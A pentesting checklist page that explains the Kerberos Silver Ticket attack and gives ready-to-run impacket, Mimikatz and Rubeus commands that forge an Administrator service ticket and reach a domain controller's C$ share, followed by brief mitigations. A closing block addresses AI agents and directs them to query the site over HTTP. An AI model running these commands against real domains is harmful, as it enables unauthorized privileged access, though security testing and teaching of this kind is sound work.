# Silver Ticket Attack ### Overview A Silver Ticket attack is a Kerberos service ticket forgery attack that allows an attacker to authenticate directly to a specific service (such as CIFS, HTTP, MSSQL, or HOST) without contacting the domain controller. Unlike a Golden Ticket attack, which forges a **Ticket Granting Ticket (TGT)** signed with the **KRBTGT** key, a Silver Ticket forges a **Ticket Granting Service (TGS)** ticket using the **secret of the target service account**. Because the service itself validates the ticket using its own key, the domain controller is **never involved** in authentication. {% hint style="info" %} ***Note**: We still put admin info inside the TGS ticket but we would only be able to access SQL service with that admin account. If we try to access a service named XYZ with the forged ticket, the service XYZ will not be able to decrypt the ticket as the forged ticket is encrypted with the SQL service password hash and not the XYZ service password hash.* {% endhint %} ### Prerequisites 1. Attacker must have the NT hash of the target service account. 2. Must know the SPN of the service, domain name, domain SID and hostname. 3. The service must use Kerberos authentication. ### Steps 1. Identify the service account and the NT hash. 2. Create a Silver Ticket and use it: ```bash # LINUX: Create ticket and access the privileged share. impacket-ticketer \ -nthash \ -domain toffee.bth \ -domain-sid S-1-5-21-1111111111-2222222222-3333333333 \ -spn cifs/dc.toffee.bth \ Administrator export KRB5CCNAME=Administrator.ccache smbclient -k -no-pass //dc.toffee.bth/C$ # WINDOWS(Mimikatz): Forges a TGS and Injects it directly into LSASS. kerberos::golden \ /domain:toffee.bth \ /sid:S-1-5-21-1111111111-2222222222-3333333333 \ /target:dc.toffee.bth \ /service:cifs \ /rc4: \ /user:Administrator \ /ptt klist # Check if the ticket generated is cached now dir \\dc.toffee.bth\C$ # WINDOWS(Rubeus): Forges a TGS and Injects it directly into LSASS. Rubeus.exe silver \ /service:cifs/dc.toffee.bth \ /rc4: \ /user:Administrator \ /domain:toffee.bth \ /sid:S-1-5-21-1111111111-2222222222-3333333333 \ /ptt klist # Check if the ticket generated is cached now dir \\dc.toffee.bth\C$ ``` ### Mitigations 1. Use Strong, Rotated Service Account Passwords 2. Minimize Service Account Privileges 3. Enforce Short Ticket Lifetimes 4. Prefer AES over RC4 for Kerberos --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://gokulkarthik.gitbook.io/pentesting-checklist/windows-and-active-directory/post-compromise-attacks/silver-ticket-attack.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.